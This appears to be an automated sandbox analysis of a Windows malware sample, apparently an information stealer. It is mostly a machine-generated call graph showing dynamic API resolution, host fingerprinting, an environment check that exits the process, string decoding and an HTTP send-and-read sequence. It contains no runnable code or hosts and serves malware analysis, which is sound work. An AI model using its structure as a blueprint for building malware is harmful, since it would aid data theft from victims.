38387->38388 38389 e64610 2 API calls 38388->38389 38390 e62c95 38389->38390 38391 e64610 2 API calls 38390->38391 38392 e62cae 38391->38392 38393 e64610 2 API calls 38392->38393 38394 e62cc7 38393->38394 38395 e64610 2 API calls 38394->38395 38396 e62ce0 38395->38396 38397 e64610 2 API calls 38396->38397 38398 e62cf9 38397->38398 38399 e64610 2 API calls 38398->38399 38400 e62d12 38399->38400 38401 e64610 2 API calls 38400->38401 38402 e62d2b 38401->38402 38403 e64610 2 API calls 38402->38403 38404 e62d44 38403->38404 38405 e64610 2 API calls 38404->38405 38406 e62d5d 38405->38406 38407 e64610 2 API calls 38406->38407 38408 e62d76 38407->38408 38409 e64610 2 API calls 38408->38409 38410 e62d8f 38409->38410 38411 e64610 2 API calls 38410->38411 38412 e62da8 38411->38412 38413 e64610 2 API calls 38412->38413 38414 e62dc1 38413->38414 38415 e64610 2 API calls 38414->38415 38416 e62dda 38415->38416 38417 e64610 2 API calls 38416->38417 38418 e62df3 38417->38418 38419 e64610 2 API calls 38418->38419 38420 e62e0c 38419->38420 38421 e64610 2 API calls 38420->38421 38422 e62e25 38421->38422 38423 e64610 2 API calls 38422->38423 38424 e62e3e 38423->38424 38425 e64610 2 API calls 38424->38425 38426 e62e57 38425->38426 38427 e64610 2 API calls 38426->38427 38428 e62e70 38427->38428 38429 e64610 2 API calls 38428->38429 38430 e62e89 38429->38430 38431 e64610 2 API calls 38430->38431 38432 e62ea2 38431->38432 38433 e64610 2 API calls 38432->38433 38434 e62ebb 38433->38434 38435 e64610 2 API calls 38434->38435 38436 e62ed4 38435->38436 38437 e64610 2 API calls 38436->38437 38438 e62eed 38437->38438 38439 e64610 2 API calls 38438->38439 38440 e62f06 38439->38440 38441 e64610 2 API calls 38440->38441 38442 e62f1f 38441->38442 38443 e64610 2 API calls 38442->38443 38444 e62f38 38443->38444 38445 e64610 2 API calls 38444->38445 38446 e62f51 38445->38446 38447 e64610 2 API calls 38446->38447 38448 e62f6a 38447->38448 38449 e64610 2 API calls 38448->38449 38450 e62f83 38449->38450 38451 e64610 2 API calls 38450->38451 38452 e62f9c 38451->38452 38453 e64610 2 API calls 38452->38453 38454 e62fb5 38453->38454 38455 e64610 2 API calls 38454->38455 38456 e62fce 38455->38456 38457 e64610 2 API calls 38456->38457 38458 e62fe7 38457->38458 38459 e64610 2 API calls 38458->38459 38460 e63000 38459->38460 38461 e64610 2 API calls 38460->38461 38462 e63019 38461->38462 38463 e64610 2 API calls 38462->38463 38464 e63032 38463->38464 38465 e64610 2 API calls 38464->38465 38466 e6304b 38465->38466 38467 e64610 2 API calls 38466->38467 38468 e63064 38467->38468 38469 e64610 2 API calls 38468->38469 38470 e6307d 38469->38470 38471 e64610 2 API calls 38470->38471 38472 e63096 38471->38472 38473 e64610 2 API calls 38472->38473 38474 e630af 38473->38474 38475 e64610 2 API calls 38474->38475 38476 e630c8 38475->38476 38477 e64610 2 API calls 38476->38477 38478 e630e1 38477->38478 38479 e64610 2 API calls 38478->38479 38480 e630fa 38479->38480 38481 e64610 2 API calls 38480->38481 38482 e63113 38481->38482 38483 e64610 2 API calls 38482->38483 38484 e6312c 38483->38484 38485 e64610 2 API calls 38484->38485 38486 e63145 38485->38486 38487 e64610 2 API calls 38486->38487 38488 e6315e 38487->38488 38489 e64610 2 API calls 38488->38489 38490 e63177 38489->38490 38491 e64610 2 API calls 38490->38491 38492 e63190 38491->38492 38493 e64610 2 API calls 38492->38493 38494 e631a9 38493->38494 38495 e64610 2 API calls 38494->38495 38496 e631c2 38495->38496 38497 e64610 2 API calls 38496->38497 38498 e631db 38497->38498 38499 e64610 2 API calls 38498->38499 38500 e631f4 38499->38500 38501 e64610 2 API calls 38500->38501 38502 e6320d 38501->38502 38503 e64610 2 API calls 38502->38503 38504 e63226 38503->38504 38505 e64610 2 API calls 38504->38505 38506 e6323f 38505->38506 38507 e64610 2 API calls 38506->38507 38508 e63258 38507->38508 38509 e64610 2 API calls 38508->38509 38510 e63271 38509->38510 38511 e64610 2 API calls 38510->38511 38512 e6328a 38511->38512 38513 e64610 2 API calls 38512->38513 38514 e632a3 38513->38514 38515 e64610 2 API calls 38514->38515 38516 e632bc 38515->38516 38517 e64610 2 API calls 38516->38517 38518 e632d5 38517->38518 38519 e64610 2 API calls 38518->38519 38520 e632ee 38519->38520 38521 e64610 2 API calls 38520->38521 38522 e63307 38521->38522 38523 e64610 2 API calls 38522->38523 38524 e63320 38523->38524 38525 e64610 2 API calls 38524->38525 38526 e63339 38525->38526 38527 e64610 2 API calls 38526->38527 38528 e63352 38527->38528 38529 e64610 2 API calls 38528->38529 38530 e6336b 38529->38530 38531 e64610 2 API calls 38530->38531 38532 e63384 38531->38532 38533 e64610 2 API calls 38532->38533 38534 e6339d 38533->38534 38535 e64610 2 API calls 38534->38535 38536 e633b6 38535->38536 38537 e64610 2 API calls 38536->38537 38538 e633cf 38537->38538 38539 e64610 2 API calls 38538->38539 38540 e633e8 38539->38540 38541 e64610 2 API calls 38540->38541 38542 e63401 38541->38542 38543 e64610 2 API calls 38542->38543 38544 e6341a 38543->38544 38545 e64610 2 API calls 38544->38545 38546 e63433 38545->38546 38547 e64610 2 API calls 38546->38547 38548 e6344c 38547->38548 38549 e64610 2 API calls 38548->38549 38550 e63465 38549->38550 38551 e64610 2 API calls 38550->38551 38552 e6347e 38551->38552 38553 e64610 2 API calls 38552->38553 38554 e63497 38553->38554 38555 e64610 2 API calls 38554->38555 38556 e634b0 38555->38556 38557 e64610 2 API calls 38556->38557 38558 e634c9 38557->38558 38559 e64610 2 API calls 38558->38559 38560 e634e2 38559->38560 38561 e64610 2 API calls 38560->38561 38562 e634fb 38561->38562 38563 e64610 2 API calls 38562->38563 38564 e63514 38563->38564 38565 e64610 2 API calls 38564->38565 38566 e6352d 38565->38566 38567 e64610 2 API calls 38566->38567 38568 e63546 38567->38568 38569 e64610 2 API calls 38568->38569 38570 e6355f 38569->38570 38571 e64610 2 API calls 38570->38571 38572 e63578 38571->38572 38573 e64610 2 API calls 38572->38573 38574 e63591 38573->38574 38575 e64610 2 API calls 38574->38575 38576 e635aa 38575->38576 38577 e64610 2 API calls 38576->38577 38578 e635c3 38577->38578 38579 e64610 2 API calls 38578->38579 38580 e635dc 38579->38580 38581 e64610 2 API calls 38580->38581 38582 e635f5 38581->38582 38583 e64610 2 API calls 38582->38583 38584 e6360e 38583->38584 38585 e64610 2 API calls 38584->38585 38586 e63627 38585->38586 38587 e64610 2 API calls 38586->38587 38588 e63640 38587->38588 38589 e64610 2 API calls 38588->38589 38590 e63659 38589->38590 38591 e64610 2 API calls 38590->38591 38592 e63672 38591->38592 38593 e64610 2 API calls 38592->38593 38594 e6368b 38593->38594 38595 e64610 2 API calls 38594->38595 38596 e636a4 38595->38596 38597 e64610 2 API calls 38596->38597 38598 e636bd 38597->38598 38599 e64610 2 API calls 38598->38599 38600 e636d6 38599->38600 38601 e64610 2 API calls 38600->38601 38602 e636ef 38601->38602 38603 e64610 2 API calls 38602->38603 38604 e63708 38603->38604 38605 e64610 2 API calls 38604->38605 38606 e63721 38605->38606 38607 e64610 2 API calls 38606->38607 38608 e6373a 38607->38608 38609 e64610 2 API calls 38608->38609 38610 e63753 38609->38610 38611 e64610 2 API calls 38610->38611 38612 e6376c 38611->38612 38613 e64610 2 API calls 38612->38613 38614 e63785 38613->38614 38615 e64610 2 API calls 38614->38615 38616 e6379e 38615->38616 38617 e64610 2 API calls 38616->38617 38618 e637b7 38617->38618 38619 e64610 2 API calls 38618->38619 38620 e637d0 38619->38620 38621 e64610 2 API calls 38620->38621 38622 e637e9 38621->38622 38623 e64610 2 API calls 38622->38623 38624 e63802 38623->38624 38625 e64610 2 API calls 38624->38625 38626 e6381b 38625->38626 38627 e64610 2 API calls 38626->38627 38628 e63834 38627->38628 38629 e64610 2 API calls 38628->38629 38630 e6384d 38629->38630 38631 e64610 2 API calls 38630->38631 38632 e63866 38631->38632 38633 e64610 2 API calls 38632->38633 38634 e6387f 38633->38634 38635 e64610 2 API calls 38634->38635 38636 e63898 38635->38636 38637 e64610 2 API calls 38636->38637 38638 e638b1 38637->38638 38639 e64610 2 API calls 38638->38639 38640 e638ca 38639->38640 38641 e64610 2 API calls 38640->38641 38642 e638e3 38641->38642 38643 e64610 2 API calls 38642->38643 38644 e638fc 38643->38644 38645 e64610 2 API calls 38644->38645 38646 e63915 38645->38646 38647 e64610 2 API calls 38646->38647 38648 e6392e 38647->38648 38649 e64610 2 API calls 38648->38649 38650 e63947 38649->38650 38651 e64610 2 API calls 38650->38651 38652 e63960 38651->38652 38653 e64610 2 API calls 38652->38653 38654 e63979 38653->38654 38655 e64610 2 API calls 38654->38655 38656 e63992 38655->38656 38657 e64610 2 API calls 38656->38657 38658 e639ab 38657->38658 38659 e64610 2 API calls 38658->38659 38660 e639c4 38659->38660 38661 e64610 2 API calls 38660->38661 38662 e639dd 38661->38662 38663 e64610 2 API calls 38662->38663 38664 e639f6 38663->38664 38665 e64610 2 API calls 38664->38665 38666 e63a0f 38665->38666 38667 e64610 2 API calls 38666->38667 38668 e63a28 38667->38668 38669 e64610 2 API calls 38668->38669 38670 e63a41 38669->38670 38671 e64610 2 API calls 38670->38671 38672 e63a5a 38671->38672 38673 e64610 2 API calls 38672->38673 38674 e63a73 38673->38674 38675 e64610 2 API calls 38674->38675 38676 e63a8c 38675->38676 38677 e64610 2 API calls 38676->38677 38678 e63aa5 38677->38678 38679 e64610 2 API calls 38678->38679 38680 e63abe 38679->38680 38681 e64610 2 API calls 38680->38681 38682 e63ad7 38681->38682 38683 e64610 2 API calls 38682->38683 38684 e63af0 38683->38684 38685 e64610 2 API calls 38684->38685 38686 e63b09 38685->38686 38687 e64610 2 API calls 38686->38687 38688 e63b22 38687->38688 38689 e64610 2 API calls 38688->38689 38690 e63b3b 38689->38690 38691 e64610 2 API calls 38690->38691 38692 e63b54 38691->38692 38693 e64610 2 API calls 38692->38693 38694 e63b6d 38693->38694 38695 e64610 2 API calls 38694->38695 38696 e63b86 38695->38696 38697 e64610 2 API calls 38696->38697 38698 e63b9f 38697->38698 38699 e64610 2 API calls 38698->38699 38700 e63bb8 38699->38700 38701 e64610 2 API calls 38700->38701 38702 e63bd1 38701->38702 38703 e64610 2 API calls 38702->38703 38704 e63bea 38703->38704 38705 e64610 2 API calls 38704->38705 38706 e63c03 38705->38706 38707 e64610 2 API calls 38706->38707 38708 e63c1c 38707->38708 38709 e64610 2 API calls 38708->38709 38710 e63c35 38709->38710 38711 e64610 2 API calls 38710->38711 38712 e63c4e 38711->38712 38713 e64610 2 API calls 38712->38713 38714 e63c67 38713->38714 38715 e64610 2 API calls 38714->38715 38716 e63c80 38715->38716 38717 e64610 2 API calls 38716->38717 38718 e63c99 38717->38718 38719 e64610 2 API calls 38718->38719 38720 e63cb2 38719->38720 38721 e64610 2 API calls 38720->38721 38722 e63ccb 38721->38722 38723 e64610 2 API calls 38722->38723 38724 e63ce4 38723->38724 38725 e64610 2 API calls 38724->38725 38726 e63cfd 38725->38726 38727 e64610 2 API calls 38726->38727 38728 e63d16 38727->38728 38729 e64610 2 API calls 38728->38729 38730 e63d2f 38729->38730 38731 e64610 2 API calls 38730->38731 38732 e63d48 38731->38732 38733 e64610 2 API calls 38732->38733 38734 e63d61 38733->38734 38735 e64610 2 API calls 38734->38735 38736 e63d7a 38735->38736 38737 e64610 2 API calls 38736->38737 38738 e63d93 38737->38738 38739 e64610 2 API calls 38738->38739 38740 e63dac 38739->38740 38741 e64610 2 API calls 38740->38741 38742 e63dc5 38741->38742 38743 e64610 2 API calls 38742->38743 38744 e63dde 38743->38744 38745 e64610 2 API calls 38744->38745 38746 e63df7 38745->38746 38747 e64610 2 API calls 38746->38747 38748 e63e10 38747->38748 38749 e64610 2 API calls 38748->38749 38750 e63e29 38749->38750 38751 e64610 2 API calls 38750->38751 38752 e63e42 38751->38752 38753 e64610 2 API calls 38752->38753 38754 e63e5b 38753->38754 38755 e64610 2 API calls 38754->38755 38756 e63e74 38755->38756 38757 e64610 2 API calls 38756->38757 38758 e63e8d 38757->38758 38759 e64610 2 API calls 38758->38759 38760 e63ea6 38759->38760 38761 e64610 2 API calls 38760->38761 38762 e63ebf 38761->38762 38763 e64610 2 API calls 38762->38763 38764 e63ed8 38763->38764 38765 e64610 2 API calls 38764->38765 38766 e63ef1 38765->38766 38767 e64610 2 API calls 38766->38767 38768 e63f0a 38767->38768 38769 e64610 2 API calls 38768->38769 38770 e63f23 38769->38770 38771 e64610 2 API calls 38770->38771 38772 e63f3c 38771->38772 38773 e64610 2 API calls 38772->38773 38774 e63f55 38773->38774 38775 e64610 2 API calls 38774->38775 38776 e63f6e 38775->38776 38777 e64610 2 API calls 38776->38777 38778 e63f87 38777->38778 38779 e64610 2 API calls 38778->38779 38780 e63fa0 38779->38780 38781 e64610 2 API calls 38780->38781 38782 e63fb9 38781->38782 38783 e64610 2 API calls 38782->38783 38784 e63fd2 38783->38784 38785 e64610 2 API calls 38784->38785 38786 e63feb 38785->38786 38787 e64610 2 API calls 38786->38787 38788 e64004 38787->38788 38789 e64610 2 API calls 38788->38789 38790 e6401d 38789->38790 38791 e64610 2 API calls 38790->38791 38792 e64036 38791->38792 38793 e64610 2 API calls 38792->38793 38794 e6404f 38793->38794 38795 e64610 2 API calls 38794->38795 38796 e64068 38795->38796 38797 e64610 2 API calls 38796->38797 38798 e64081 38797->38798 38799 e64610 2 API calls 38798->38799 38800 e6409a 38799->38800 38801 e64610 2 API calls 38800->38801 38802 e640b3 38801->38802 38803 e64610 2 API calls 38802->38803 38804 e640cc 38803->38804 38805 e64610 2 API calls 38804->38805 38806 e640e5 38805->38806 38807 e64610 2 API calls 38806->38807 38808 e640fe 38807->38808 38809 e64610 2 API calls 38808->38809 38810 e64117 38809->38810 38811 e64610 2 API calls 38810->38811 38812 e64130 38811->38812 38813 e64610 2 API calls 38812->38813 38814 e64149 38813->38814 38815 e64610 2 API calls 38814->38815 38816 e64162 38815->38816 38817 e64610 2 API calls 38816->38817 38818 e6417b 38817->38818 38819 e64610 2 API calls 38818->38819 38820 e64194 38819->38820 38821 e64610 2 API calls 38820->38821 38822 e641ad 38821->38822 38823 e64610 2 API calls 38822->38823 38824 e641c6 38823->38824 38825 e64610 2 API calls 38824->38825 38826 e641df 38825->38826 38827 e64610 2 API calls 38826->38827 38828 e641f8 38827->38828 38829 e64610 2 API calls 38828->38829 38830 e64211 38829->38830 38831 e64610 2 API calls 38830->38831 38832 e6422a 38831->38832 38833 e64610 2 API calls 38832->38833 38834 e64243 38833->38834 38835 e64610 2 API calls 38834->38835 38836 e6425c 38835->38836 38837 e64610 2 API calls 38836->38837 38838 e64275 38837->38838 38839 e64610 2 API calls 38838->38839 38840 e6428e 38839->38840 38841 e64610 2 API calls 38840->38841 38842 e642a7 38841->38842 38843 e64610 2 API calls 38842->38843 38844 e642c0 38843->38844 38845 e64610 2 API calls 38844->38845 38846 e642d9 38845->38846 38847 e64610 2 API calls 38846->38847 38848 e642f2 38847->38848 38849 e64610 2 API calls 38848->38849 38850 e6430b 38849->38850 38851 e64610 2 API calls 38850->38851 38852 e64324 38851->38852 38853 e64610 2 API calls 38852->38853 38854 e6433d 38853->38854 38855 e64610 2 API calls 38854->38855 38856 e64356 38855->38856 38857 e64610 2 API calls 38856->38857 38858 e6436f 38857->38858 38859 e64610 2 API calls 38858->38859 38860 e64388 38859->38860 38861 e64610 2 API calls 38860->38861 38862 e643a1 38861->38862 38863 e64610 2 API calls 38862->38863 38864 e643ba 38863->38864 38865 e64610 2 API calls 38864->38865 38866 e643d3 38865->38866 38867 e64610 2 API calls 38866->38867 38868 e643ec 38867->38868 38869 e64610 2 API calls 38868->38869 38870 e64405 38869->38870 38871 e64610 2 API calls 38870->38871 38872 e6441e 38871->38872 38873 e64610 2 API calls 38872->38873 38874 e64437 38873->38874 38875 e64610 2 API calls 38874->38875 38876 e64450 38875->38876 38877 e64610 2 API calls 38876->38877 38878 e64469 38877->38878 38879 e64610 2 API calls 38878->38879 38880 e64482 38879->38880 38881 e64610 2 API calls 38880->38881 38882 e6449b 38881->38882 38883 e64610 2 API calls 38882->38883 38884 e644b4 38883->38884 38885 e64610 2 API calls 38884->38885 38886 e644cd 38885->38886 38887 e64610 2 API calls 38886->38887 38888 e644e6 38887->38888 38889 e64610 2 API calls 38888->38889 38890 e644ff 38889->38890 38891 e64610 2 API calls 38890->38891 38892 e64518 38891->38892 38893 e64610 2 API calls 38892->38893 38894 e64531 38893->38894 38895 e64610 2 API calls 38894->38895 38896 e6454a 38895->38896 38897 e64610 2 API calls 38896->38897 38898 e64563 38897->38898 38899 e64610 2 API calls 38898->38899 38900 e6457c 38899->38900 38901 e64610 2 API calls 38900->38901 38902 e64595 38901->38902 38903 e64610 2 API calls 38902->38903 38904 e645ae 38903->38904 38905 e64610 2 API calls 38904->38905 38906 e645c7 38905->38906 38907 e64610 2 API calls 38906->38907 38908 e645e0 38907->38908 38909 e64610 2 API calls 38908->38909 38910 e645f9 38909->38910 38911 e79f20 38910->38911 38912 e7a346 8 API calls 38911->38912 38913 e79f30 43 API calls 38911->38913 38914 e7a456 38912->38914 38915 e7a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38912->38915 38913->38912 38916 e7a526 38914->38916 38917 e7a463 8 API calls 38914->38917 38915->38914 38918 e7a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38916->38918 38919 e7a5a8 38916->38919 38917->38916 38918->38919 38920 e7a647 38919->38920 38921 e7a5b5 6 API calls 38919->38921 38922 e7a654 9 API calls 38920->38922 38923 e7a72f 38920->38923 38921->38920 38922->38923 38924 e7a7b2 38923->38924 38925 e7a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38923->38925 38926 e7a7ec 38924->38926 38927 e7a7bb GetProcAddress GetProcAddress 38924->38927 38925->38924 38928 e7a825 38926->38928 38929 e7a7f5 GetProcAddress GetProcAddress 38926->38929 38927->38926 38930 e7a922 38928->38930 38931 e7a832 10 API calls 38928->38931 38929->38928 38932 e7a98d 38930->38932 38933 e7a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38930->38933 38931->38930 38934 e7a996 GetProcAddress 38932->38934 38935 e7a9ae 38932->38935 38933->38932 38934->38935 38936 e7a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38935->38936 38937 e75ef3 38935->38937 38936->38937 38938 e61590 38937->38938 39208 e616b0 38938->39208 38941 e7aab0 lstrcpy 38942 e615b5 38941->38942 38943 e7aab0 lstrcpy 38942->38943 38944 e615c7 38943->38944 38945 e7aab0 lstrcpy 38944->38945 38946 e615d9 38945->38946 38947 e7aab0 lstrcpy 38946->38947 38948 e61663 38947->38948 38949 e75760 38948->38949 38950 e75771 38949->38950 38951 e7ab30 2 API calls 38950->38951 38952 e7577e 38951->38952 38953 e7ab30 2 API calls 38952->38953 38954 e7578b 38953->38954 38955 e7ab30 2 API calls 38954->38955 38956 e75798 38955->38956 38957 e7aa50 lstrcpy 38956->38957 38958 e757a5 38957->38958 38959 e7aa50 lstrcpy 38958->38959 38960 e757b2 38959->38960 38961 e7aa50 lstrcpy 38960->38961 38962 e757bf 38961->38962 38963 e7aa50 lstrcpy 38962->38963 39003 e757cc 38963->39003 38964 e75440 20 API calls 38964->39003 38965 e75893 StrCmpCA 38965->39003 38966 e758f0 StrCmpCA 38967 e75a2c 38966->38967 38966->39003 38968 e7abb0 lstrcpy 38967->38968 38969 e75a38 38968->38969 38970 e7ab30 2 API calls 38969->38970 38972 e75a46 38970->38972 38971 e7ab30 lstrlen lstrcpy 38971->39003 38974 e7ab30 2 API calls 38972->38974 38973 e75aa6 StrCmpCA 38975 e75be1 38973->38975 38973->39003 38977 e75a55 38974->38977 38976 e7abb0 lstrcpy 38975->38976 38978 e75bed 38976->38978 38979 e616b0 lstrcpy 38977->38979 38980 e7ab30 2 API calls 38978->38980 39001 e75a61 38979->39001 38982 e75bfb 38980->38982 38981 e7aa50 lstrcpy 38981->39003 38985 e7ab30 2 API calls 38982->38985 38983 e75c5b StrCmpCA 38986 e75c66 Sleep 38983->38986 38987 e75c78 38983->38987 38984 e75510 25 API calls 38984->39003 38989 e75c0a 38985->38989 38986->39003 38990 e7abb0 lstrcpy 38987->38990 38988 e7aab0 lstrcpy 38988->39003 38991 e616b0 lstrcpy 38989->38991 38992 e75c84 38990->38992 38991->39001 38993 e7ab30 2 API calls 38992->38993 38994 e75c93 38993->38994 38995 e7ab30 2 API calls 38994->38995 38997 e75ca2 38995->38997 38996 e759da StrCmpCA 38996->39003 38998 e616b0 lstrcpy 38997->38998 38998->39001 38999 e61590 lstrcpy 38999->39003 39000 e75b8f StrCmpCA 39000->39003 39001->38056 39002 e7abb0 lstrcpy 39002->39003 39003->38964 39003->38965 39003->38966 39003->38971 39003->38973 39003->38981 39003->38983 39003->38984 39003->38988 39003->38996 39003->38999 39003->39000 39003->39002 39005 e776e3 GetVolumeInformationA 39004->39005 39006 e776dc 39004->39006 39007 e77721 39005->39007 39006->39005 39008 e7778c GetProcessHeap RtlAllocateHeap 39007->39008 39009 e777a9 39008->39009 39010 e777b8 wsprintfA 39008->39010 39012 e7aa50 lstrcpy 39009->39012 39011 e7aa50 lstrcpy 39010->39011 39013 e75ff7 39011->39013 39012->39013 39013->38077 39015 e7aab0 lstrcpy 39014->39015 39016 e648e9 39015->39016 39217 e64800 39016->39217 39018 e648f5 39019 e7aa50 lstrcpy 39018->39019 39020 e64927 39019->39020 39021 e7aa50 lstrcpy 39020->39021 39022 e64934 39021->39022 39023 e7aa50 lstrcpy 39022->39023 39024 e64941 39023->39024 39025 e7aa50 lstrcpy 39024->39025 39026 e6494e 39025->39026 39027 e7aa50 lstrcpy 39026->39027 39028 e6495b InternetOpenA StrCmpCA 39027->39028 39029 e64994 39028->39029 39030 e64f1b InternetCloseHandle 39029->39030 39223 e78cf0 39029->39223 39032 e64f38 39030->39032 39238 e6a210 CryptStringToBinaryA 39032->39238 39033 e649b3 39231 e7ac30 39033->39231 39036 e649c6 39038 e7abb0 lstrcpy 39036->39038 39043 e649cf 39038->39043 39039 e7ab30 2 API calls 39040 e64f55 39039->39040 39042 e7acc0 4 API calls 39040->39042 39041 e64f77 ctype 39045 e7aab0 lstrcpy 39041->39045 39044 e64f6b 39042->39044 39047 e7acc0 4 API calls 39043->39047 39046 e7abb0 lstrcpy 39044->39046 39058 e64fa7 39045->39058 39046->39041 39048 e649f9 39047->39048 39049 e7abb0 lstrcpy 39048->39049 39050 e64a02 39049->39050 39051 e7acc0 4 API calls 39050->39051 39052 e64a21 39051->39052 39053 e7abb0 lstrcpy 39052->39053 39054 e64a2a 39053->39054 39055 e7ac30 3 API calls 39054->39055 39056 e64a48 39055->39056 39057 e7abb0 lstrcpy 39056->39057 39059 e64a51 39057->39059 39058->38080 39060 e7acc0 4 API calls 39059->39060 39061 e64a70 39060->39061 39062 e7abb0 lstrcpy 39061->39062 39063 e64a79 39062->39063 39064 e7acc0 4 API calls 39063->39064 39065 e64a98 39064->39065 39066 e7abb0 lstrcpy 39065->39066 39067 e64aa1 39066->39067 39068 e7acc0 4 API calls 39067->39068 39069 e64acd 39068->39069 39070 e7ac30 3 API calls 39069->39070 39071 e64ad4 39070->39071 39072 e7abb0 lstrcpy 39071->39072 39073 e64add 39072->39073 39074 e64af3 InternetConnectA 39073->39074 39074->39030 39075 e64b23 HttpOpenRequestA 39074->39075 39077 e64f0e InternetCloseHandle 39075->39077 39078 e64b78 39075->39078 39077->39030 39079 e7acc0 4 API calls 39078->39079 39080 e64b8c 39079->39080 39081 e7abb0 lstrcpy 39080->39081 39082 e64b95 39081->39082 39083 e7ac30 3 API calls 39082->39083 39084 e64bb3 39083->39084 39085 e7abb0 lstrcpy 39084->39085 39086 e64bbc 39085->39086 39087 e7acc0 4 API calls 39086->39087 39088 e64bdb 39087->39088 39089 e7abb0 lstrcpy 39088->39089 39090 e64be4 39089->39090 39091 e7acc0 4 API calls 39090->39091 39092 e64c05 39091->39092 39093 e7abb0 lstrcpy 39092->39093 39094 e64c0e 39093->39094 39095 e7acc0 4 API calls 39094->39095 39096 e64c2e 39095->39096 39097 e7abb0 lstrcpy 39096->39097 39098 e64c37 39097->39098 39099 e7acc0 4 API calls 39098->39099 39100 e64c56 39099->39100 39101 e7abb0 lstrcpy 39100->39101 39102 e64c5f 39101->39102 39103 e7ac30 3 API calls 39102->39103 39104 e64c7d 39103->39104 39105 e7abb0 lstrcpy 39104->39105 39106 e64c86 39105->39106 39107 e7acc0 4 API calls 39106->39107 39108 e64ca5 39107->39108 39109 e7abb0 lstrcpy 39108->39109 39110 e64cae 39109->39110 39111 e7acc0 4 API calls 39110->39111 39112 e64ccd 39111->39112 39113 e7abb0 lstrcpy 39112->39113 39114 e64cd6 39113->39114 39115 e7ac30 3 API calls 39114->39115 39116 e64cf4 39115->39116 39117 e7abb0 lstrcpy 39116->39117 39118 e64cfd 39117->39118 39119 e7acc0 4 API calls 39118->39119 39120 e64d1c 39119->39120 39121 e7abb0 lstrcpy 39120->39121 39122 e64d25 39121->39122 39123 e7acc0 4 API calls 39122->39123 39124 e64d46 39123->39124 39125 e7abb0 lstrcpy 39124->39125 39126 e64d4f 39125->39126 39127 e7acc0 4 API calls 39126->39127 39128 e64d6f 39127->39128 39129 e7abb0 lstrcpy 39128->39129 39130 e64d78 39129->39130 39131 e7acc0 4 API calls 39130->39131 39132 e64d97 39131->39132 39133 e7abb0 lstrcpy 39132->39133 39134 e64da0 39133->39134 39135 e7ac30 3 API calls 39134->39135 39136 e64dbe 39135->39136 39137 e7abb0 lstrcpy 39136->39137 39138 e64dc7 39137->39138 39139 e7aa50 lstrcpy 39138->39139 39140 e64de2 39139->39140 39141 e7ac30 3 API calls 39140->39141 39142 e64e03 39141->39142 39143 e7ac30 3 API calls 39142->39143 39144 e64e0a 39143->39144 39145 e7abb0 lstrcpy 39144->39145 39146 e64e16 39145->39146 39147 e64e37 lstrlen 39146->39147 39148 e64e4a 39147->39148 39149 e64e53 lstrlen 39148->39149 39237 e7ade0 39149->39237 39151 e64e63 HttpSendRequestA 39152 e64e82 InternetReadFile 39151->39152 39153 e64eb7 InternetCloseHandle 39152->39153 39158 e64eae 39152->39158 39155 e7ab10 39153->39155 39155->39077 39156 e7acc0 4 API calls 39156->39158 39157 e7abb0 lstrcpy 39157->39158 39158->39152 39158->39153 39158->39156 39158->39157 39244 e7ade0 39159->39244 39161 e71a14 StrCmpCA 39162 e71a1f ExitProcess 39161->39162 39174 e71a27 39161->39174 39163 e71c12 39163->38082 39164 e71b63 StrCmpCA 39164->39174 39165 e71b82 StrCmpCA 39165->39174 39166 e71b41 StrCmpCA 39166->39174 39167 e71ba1 StrCmpCA 39167->39174 39168 e71bc0 StrCmpCA 39168->39174 39169 e71acf StrCmpCA 39169->39174 39170 e71aad StrCmpCA 39170->39174 39171 e71b1f StrCmpCA 39171->39174 39172 e71afd StrCmpCA 39172->39174 39173 e7ab30 lstrlen lstrcpy 39173->39174 39174->39163 39174->39164 39174->39165 39174->39166 39174->39167 39174->39168 39174->39169 39174->39170 39174->39171 39174->39172 39174->39173 39175->38088 39176->38090 39177->38096 39178->38098 39179->38104 39180->38106 39181->38110 39182->38114 39183->38118 39184->38124 39185->38126 39186->38130 39187->38144 39188->38147 39189->38148 39190->38143 39191->38148 39192->38163 39193->38151 39194->38154 39195->38157 39196->38160 39197->38165 39198->38167 39199->38174 39200->38180 39201->38201 39202->38204 39203->38211 39204->38200 39205->38211 39206->38214 39209 e7aab0 lstrcpy 39208->39209 39210 e616c3 39209->39210 39211 e7aab0 lstrcpy 39210->39211 39212 e616d5 39211->39212 39213 e7aab0 lstrcpy 39212->39213 39214 e616e7 39213->39214 39215 e7aab0 lstrcpy 39214->39215 39216 e615a3 39215->39216 39216->38941 39218 e64816 39217->39218 39219 e64888 lstrlen 39218->39219 39243 e7ade0 39219->39243 39221 e64898 InternetCrackUrlA 39222 e648b7 39221->39222 39222->39018 39224 e7aa50 lstrcpy 39223->39224 39225 e78d04 39224->39225 39226 e7aa50 lstrcpy 39225->39226 39227 e78d12 GetSystemTime 39226->39227 39229 e78d29 39227->39229 39228 e7aab0 lstrcpy 39230 e78d8c 39228->39230 39229->39228 39230->39033 39233 e7ac41 39231->39233 39232 e7ac98 39234 e7aab0 lstrcpy 39232->39234 39233->39232 39235 e7ac78 lstrcpy lstrcat 39233->39235 39236 e7aca4 39234->39236 39235->39232 39236->39036 39237->39151 39239 e64f3e 39238->39239 39240 e6a249 LocalAlloc 39238->39240 39239->39039 39239->39041 39240->39239 39241 e6a264 CryptStringToBinaryA 39240->39241 39241->39239 39242 e6a289 LocalFree 39241->39242 39242->39239 39243->39221 39244->39161

                                  Executed Functions

                                  Function 00E79BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 e79bb0-e79bc4 call e79aa0 663 e79de3-e79e42 LoadLibraryA * 5 660->663 664 e79bca-e79dde call e79ad0 GetProcAddress * 21 660->664 666 e79e44-e79e58 GetProcAddress 663->666 667 e79e5d-e79e64 663->667 664->663 666->667 669 e79e96-e79e9d 667->669 670 e79e66-e79e91 GetProcAddress * 2 667->670 671 e79e9f-e79eb3 GetProcAddress 669->671 672 e79eb8-e79ebf 669->672 670->669 671->672 673 e79ec1-e79ed4 GetProcAddress 672->673 674 e79ed9-e79ee0 672->674 673->674 675 e79ee2-e79f0c GetProcAddress * 2 674->675 676 e79f11-e79f12 674->676 675->676
                                  APIs
